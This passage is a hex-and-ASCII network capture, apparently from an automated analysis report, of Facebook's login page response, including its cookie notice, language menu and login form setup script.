61 79 65 72 46
                                                                                                                                                                                    Data Ascii: v_Mu"},"label":"\ud55c\uad6d\uc5b4","title":"","className":"headerItem"}],{"id":"u_0_6_ir","behaviors":[{"__m":"XUIMenuWithSquareCorner"}],"className":"_57di","maxheight":500,"theme":{"__m":"XUIMenuTheme"}}],3],["__inst_ead1e565_0_0_vo",["DialogX","LayerF
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19986INData Raw: 6e 68 22 3a 22 6c 65 66 74 22 2c 22 70 6f 73 69 74 69 6f 6e 22 3a 22 62 65 6c 6f 77 22 7d 5d 2c 32 5d 5d 2c 22 6d 61 72 6b 75 70 22 3a 5b 5b 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 43 4b 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 34 2d 69 32 20 5f 70 69 67 20 5f 39 6f 2d 63 20 5f 39 70 6c 6c 20 5f 35 30 66 34 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6c 32 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 61 69 73 66 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 36 61 20 75 69 50 6f 70 6f 76 65 72 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 37 5f 6e 63 5c 22 3e 5c 75 30 30 33 43 61 20 72
                                                                                                                                                                                    Data Ascii: nh":"left","position":"below"}],2]],"markup":[["__markup_9f5fac15_0_0_CK",{"__html":"\u003Cdiv>\u003Cdiv class=\"_4-i2 _pig _9o-c _9pll _50f4\">\u003Cdiv class=\"_9xl2\">\u003Cdiv class=\"_aisf\">\u003Cdiv class=\"_6a uiPopover\" id=\"u_0_7_nc\">\u003Ca r
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19988INData Raw: 68 6f 20 68 61 76 65 20 61 6e 20 61 63 63 6f 75 6e 74 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 46 6f 72 20 61 64 76 65 72 74 69 73 69 6e 67 20 61 6e 64 20 6d 65 61 73 75 72 65 6d 65 6e 74 20 73 65 72 76 69 63 65 73 20 6f 66 66 20 6f 66 20 4d 65 74 61 20 50 72 6f 64 75 63 74 73 2c 20 61 6e 61 6c 79 74 69 63 73 2c 20 61 6e 64 20 74 6f 20 70 72 6f 76 69 64 65 20 63 65 72 74 61 69 6e 20 66 65 61 74 75 72 65 73 20 61 6e 64 20 69 6d 70 72 6f 76 65 20 6f 75 72 20 73 65 72 76 69 63 65 73 20 66 6f 72 20 79 6f 75 2c 20 77 65 20
                                                                                                                                                                                    Data Ascii: ho have an account\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003Cdiv>\u003Cdiv>For advertising and measurement services off of Meta Products, analytics, and to provide certain features and improve our services for you, we
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19989INData Raw: 74 69 63 73 2c 20 61 6e 64 20 74 6f 20 70 72 6f 76 69 64 65 20 63 65 72 74 61 69 6e 20 66 65 61 74 75 72 65 73 20 61 6e 64 20 69 6d 70 72 6f 76 65 20 6f 75 72 20 73 65 72 76 69 63 65 73 20 66 6f 72 20 79 6f 75 2e 20 54 68 65 73 65 20 63 6f 6d 70 61 6e 69 65 73 20 61 6c 73 6f 20 75 73 65 20 63 6f 6f 6b 69 65 73 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 70 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 39 5f 5c 2f 77 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e 67 65 5c 22 20 74 69 74 6c 65 3d 5c 22 65 78 70 61 6e 64 61 62 6c 65 20 73 65 63 74 69 6f 6e 5c 22 3e 5c
                                                                                                                                                                                    Data Ascii: tics, and to provide certain features and improve our services for you. These companies also use cookies.\u003C\/div>\u003C\/div>\u003Cp>\u003C\/p>\u003Cdiv class=\"_9vtg\" id=\"u_0_9_\/w\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expandable section\">\
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19991INData Raw: 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6b 5c 22 3e 4f 74 68 65 72 20 77 61 79 73 20 79 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 79 6f 75 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f
                                                                                                                                                                                    Data Ascii: 03C\/p>\u003C\/div>\u003C\/p>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cp class=\"_9o-k\">Other ways you can control your information\u003C\/p>\u003C\/div>\u003Cdiv>\u003Cdiv class=\"_
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19992INData Raw: 69 63 68 20 61 64 73 20 79 6f 75 20 6d 61 79 20 62 65 20 69 6e 74 65 72 65 73 74 65 64 20 69 6e 20 73 65 65 69 6e 67 2e 20 59 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 74 68 69 73 20 69 6e 20 79 6f 75 72 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 73 65 74 74 69 6e 67 73 5c 2f 61 64 73 5c 2f 5c 22 3e 61 64 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 61 3e 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 41 64 20 70 72 65 66 65 72 65 6e 63 65 73 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 75 73 65 20 79 6f 75 72 20 61 64 20
                                                                                                                                                                                    Data Ascii: ich ads you may be interested in seeing. You can control this in your \u003Ca href=\"https:\/\/www.facebook.com\/settings\/ads\/\">ad settings\u003C\/a>.\u003C\/p>\u003Cp class=\"_9si-\">Ad preferences\u003C\/p>\u003Cp class=\"_9o-m\">You can use your ad
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19994INData Raw: 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 62 20 5f 39 6e 67 61 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 6f 70 74 20 6f 75 74 20 6f 66 20 73 65 65 69 6e 67 20 6f 6e 6c 69 6e 65 20 69 6e 74 65 72 65 73 74 2d 62 61 73 65 64 20 61 64 73 20 66 72 6f 6d 20 4d 65 74 61 20 61 6e 64 20 6f 74 68 65 72 20 70 61 72 74 69 63 69 70 61 74 69 6e 67 20 63 6f 6d 70 61 6e 69 65 73 20 74 68 72 6f 75 67 68 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f
                                                                                                                                                                                    Data Ascii: 03C\/i>\u003C\/span>\u003C\/div>\u003C\/button>\u003Cdiv class=\"_9ngb _9nga\">\u003Cdiv>\u003Cp class=\"_9o-m\">You can opt out of seeing online interest-based ads from Meta and other participating companies through the \u003Ca href=\"https:\/\/l.faceboo
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19995INData Raw: 72 73 69 6f 6e 20 6f 66 20 69 4f 53 2e 20 50 6c 65 61 73 65 20 6e 6f 74 65 20 74 68 61 74 20 61 64 20 62 6c 6f 63 6b 65 72 73 20 61 6e 64 20 74 6f 6f 6c 73 20 74 68 61 74 20 72 65 73 74 72 69 63 74 20 6f 75 72 20 63 6f 6f 6b 69 65 20 75 73 65 20 6d 61 79 20 69 6e 74 65 72 66 65 72 65 20 77 69 74 68 20 74 68 65 73 65 20 63 6f 6e 74 72 6f 6c 73 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 54 68 65 20 61 64 76 65 72 74 69 73 69 6e 67 20 63 6f 6d 70 61 6e 69 65 73 20 77 65 20 77 6f 72 6b 20 77 69 74 68 20 67 65 6e 65 72 61 6c 6c 79 20 75 73 65 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 73 69 6d 69 6c 61 72 20 74 65 63 68 6e 6f 6c 6f 67 69 65 73 20 61 73 20 70 61 72 74 20 6f 66 20 74 68 65 69 72 20 73 65
                                                                                                                                                                                    Data Ascii: rsion of iOS. Please note that ad blockers and tools that restrict our cookie use may interfere with these controls.\u003C\/p>\u003Cp class=\"_9o-m\">The advertising companies we work with generally use cookies and similar technologies as part of their se
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19996INData Raw: 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 45 75 72 6f 70 65 61 6e 20 49 6e 74 65 72 61 63 74 69 76 65 20 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 5c 2f 75 6c 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 63 5f 5c 2f 58 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c
                                                                                                                                                                                    Data Ascii: =\"_blank\" rel=\"nofollow\" data-lynx-mode=\"asynclazy\">European Interactive Digital Advertising Alliance\u003C\/a>\u003C\/li>\u003C\/ul>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cdiv class=\"_9vtg\" id=\"u_0_c_\/X\">\u003Cbutton cl
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19998INData Raw: 7a 68 42 4a 48 43 78 30 35 4b 47 41 48 45 64 4b 4b 52 52 5f 53 62 69 46 61 62 33 50 4a 78 51 65 34 4a 42 41 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 5c 75 30 30 32 35 32 46 65 6e
                                                                                                                                                                                    Data Ascii: zhBJHCx05KGAHEdKKRR_SbiFab3PJxQe4JBA\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"asynclazy\">Google Chrome\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fsupport.microsoft.com\u00252Fen
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19999INData Raw: 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 61 70 70 6c 65 2e 63 6f 6d 5c 75 30 30 32 35 32 46 65 6e 2d 75 73 5c 75 30 30 32 35 32 46 48 54 32 30 31 32 36 35 26 61 6d 70 3b 68 3d 41 54 31 38 6e 63 6b 4c 6d 6c 4e 4a 4e 59 2d 6b 64 53 4f 47 77 6a 4a 44 34 68 76 38 77 49 2d 71 5a 6f 6a 77 62 41 7a 65 43 48 50 5f 44 44 61 6c 6a 79 77 7a 49 64 66 6d 37 45 34 6f 42 62 51 4d 42 74 66 34 4f 69 76 41 73 55 49 74 55 36 50 31 41 31 47 73 56 36 5a 5f 47 31 6b 4c 56 42 6b 45 69 37 37 46 57 49 5a 69 79 65 4a 57 38 64 6d 37 52 64 2d 5a 67 32 32 67 57 4e 47 62 76 78 61 64 68 5f 45 55 54 42 64 5f 36 6f 4e 79 4f 4d 4d 6d 6c 64 6b 37
                                                                                                                                                                                    Data Ascii: /l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fsupport.apple.com\u00252Fen-us\u00252FHT201265&amp;h=AT18nckLmlNJNY-kdSOGwjJD4hv8wI-qZojwbAzeCHP_DDaljywzIdfm7E4oBbQMBtf4OivAsUItU6P1A1GsV6Z_G1kLVBkEi77FWIZiyeJW8dm7Rd-Zg22gWNGbvxadh_EUTBd_6oNyOMMmldk7
                                                                                                                                                                                    2023-01-05 08:00:35 UTC20001INData Raw: 69 65 73 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 22 7d 2c 39 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 30 5f 69 50 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 42 61 68 61 73 61 20 49 6e 64 6f 6e 65 73 69 61 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 31 5f 54 70 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 44 61 6e 73 6b 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 32 5f 78 51 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 44 65 75 74 73 63 68 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 33 5f 6d 6f 22 2c 7b 22 5f 5f
                                                                                                                                                                                    Data Ascii: ies\u003C\/button>\u003C\/div>\u003C\/div>\u003C\/div>"},9],["__markup_3310c079_0_0_iP",{"__html":"Bahasa Indonesia"},1],["__markup_3310c079_0_1_Tp",{"__html":"Dansk"},1],["__markup_3310c079_0_2_xQ",{"__html":"Deutsch"},1],["__markup_3310c079_0_3_mo",{"__
                                                                                                                                                                                    2023-01-05 08:00:35 UTC20002INData Raw: 73 65 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 35 65 32 5c 75 30 35 64 31 5c 75 30 35 65 38 5c 75 30 35 64 39 5c 75 30 35 65 61 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6f 5f 48 6a 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 39 5c 75 30 36 33 31 5c 75 30 36 32 38 5c 75 30 36 34 61 5c 75 30 36 32 39 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 70 5f 59 31 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 39 33 39 5c 75 30 39 33 66 5c 75 30 39 32 38 5c 75 30 39 34 64 5c 75 30 39 32 36 5c 75 30 39 34 30 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 71 5f 6c 2b 22 2c 7b 22 5f 5f 68 74 6d 6c
                                                                                                                                                                                    Data Ascii: se",{"__html":"\u05e2\u05d1\u05e8\u05d9\u05ea"},1],["__markup_3310c079_0_o_Hj",{"__html":"\u0627\u0644\u0639\u0631\u0628\u064a\u0629"},1],["__markup_3310c079_0_p_Y1",{"__html":"\u0939\u093f\u0928\u094d\u0926\u0940"},1],["__markup_3310c079_0_q_l+",{"__html
                                                                                                                                                                                    2023-01-05 08:00:35 UTC20004INData Raw: 64 5f 32 5a 22 2c 31 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 43 4b 22 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 30 5f 68 36 22 2c 22 75 5f 30 5f 65 5f 42 45 22 2c 31 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 43 4b 22 5d 5d 2c 22 72 65 71 75 69 72 65 22 3a 5b 5b 22 53 65 72 76 69 63 65 57 6f 72 6b 65 72 4c 6f 67 69 6e 41 6e 64 4c 6f 67 6f 75 74 22 2c 22 6c 6f 67 69 6e 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 53 63 72 69 70 74 50 61 74 68 22 2c 22 73 65 74 22 2c 5b 5d 2c 5b 22 58 57 65 62 4c 6f 67 69 6e 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 22 39 36 65 38 38 61 66 33 22 2c 7b 22 69 6d 70 5f 69 64 22 3a 22 31 4a 38 76 76 76 45 4c 34 36 63 78 53 68 61 72 4c 22 2c 22 65 66 5f 70 61 67
                                                                                                                                                                                    Data Ascii: d_2Z",1,"__markup_9f5fac15_0_0_CK"],["__elem_45d73b5d_0_0_h6","u_0_e_BE",1,"__markup_9f5fac15_0_0_CK"]],"require":[["ServiceWorkerLoginAndLogout","login",[],[]],["ScriptPath","set",[],["XWebLoginController","96e88af3",{"imp_id":"1J8vvvEL46cxSharL","ef_pag
                                                                                                                                                                                    2023-01-05 08:00:35 UTC20005INData Raw: 2c 5b 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 31 5f 68 35 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 31 5f 68 35 22 7d 5d 5d 2c 5b 22 4c 6f 67 69 6e 46 6f 72 6d 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 75 32 22 2c 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 32 5f 33 63 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 75 32 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 32 5f 33 63 22 7d 2c 6e 75 6c 6c 2c 74 72 75 65 2c 7b 22 70 75 62 4b 65 79 22 3a 7b 22 70 75 62 6c 69 63 4b 65 79 22 3a 22 66 35 38 34 36 62 64 39
                                                                                                                                                                                    Data Ascii: ,["__elem_f46f4946_0_1_h5"],[{"__m":"__elem_f46f4946_0_1_h5"}]],["LoginFormController","init",["__elem_835c633a_0_0_u2","__elem_45d73b5d_0_2_3c"],[{"__m":"__elem_835c633a_0_0_u2"},{"__m":"__elem_45d73b5d_0_2_3c"},null,true,{"pubKey":{"publicKey":"f5846bd9
                                                                                                                                                                                    2023-01-05 08:00:35 UTC20007INData Raw: 2e 5f 39 6e 67 61 22 2c 22 2e 5f 39 6e 67 64 22 2c 22 2e 5f 39 6e 67 67 22 5d 5d 2c 5b 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 5b 22 52 65 71 75 69 72 65 44 65 66 65 72 72 65 64 52 65 66 65 72 65 6e 63 65 22 2c 22 75 6e 62 6c 6f 63 6b 22 2c 5b 5d 2c 5b 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 22 73 64 22 5d 5d 2c 5b 22 52 65 71 75 69 72 65 44 65 66 65 72 72 65 64 52 65 66 65 72 65 6e 63 65 22 2c 22 75 6e 62 6c 6f 63 6b 22 2c 5b 5d 2c 5b 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61
                                                                                                                                                                                    Data Ascii: ._9nga","._9ngd","._9ngg"]],["Animation"],["RequireDeferredReference","unblock",[],[["FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED","PageTransitions","Animation"],"sd"]],["RequireDeferredReference","unblock",[],[["FbtLogging","IntlQtEventFa
                                                                                                                                                                                    2023-01-05 08:00:35 UTC20008INData Raw: 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 32 2f 6c 2f 30 2c 63 72 6f 73 73 2f 57 5f 66 33 7a 51 30 43 63 36 65 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 39 2f 72 2f 52 2d 70 6f 45 50 65 44 52 31 38 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69
                                                                                                                                                                                    Data Ascii: as="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y2/l/0,cross/W_f3zQ0Cc6e.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/R-poEPeDR18.js?_nc_x=Ij3Wp8lg5Kz" as="scri
                                                                                                                                                                                    2023-01-05 08:00:35 UTC20010INData Raw: 73 68 22 3a 74 72 75 65 2c 22 63 6f 6e 66 69 67 22 3a 7b 22 66 6c 75 73 68 5f 70 61 67 65 6c 65 74 73 5f 61 73 61 70 22 3a 74 72 75 65 2c 22 64 69 73 70 61 74 63 68 5f 70 61 67 65 6c 65 74 5f 72 65 70 6c 61 79 61 62 6c 65 5f 61 63 74 69 6f 6e 73 22 3a 66 61 6c 73 65 7d 7d 29 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 79 44 33 7a 54 30 6a 62 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 66 69 72 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d
                                                                                                                                                                                    Data Ascii: sh":true,"config":{"flush_pagelets_asap":true,"dispatch_pagelet_replayable_actions":false}}));});</script><script nonce="yD3zT0jb">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("first_response",n);})}
                                                                                                                                                                                    2023-01-05 08:00:35 UTC20011INData Raw: 31 32 35 33 0d 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 79 44 33 7a 54 30 6a 62 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 6c 61 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 79 44 33 7a 54 30 6a 62 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 6f 6e 50 61 67 65 6c 65 74 41
                                                                                                                                                                                    Data Ascii: 1253<script nonce="yD3zT0jb">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("last_response",n);})})();</script><script nonce="yD3zT0jb">requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPageletA
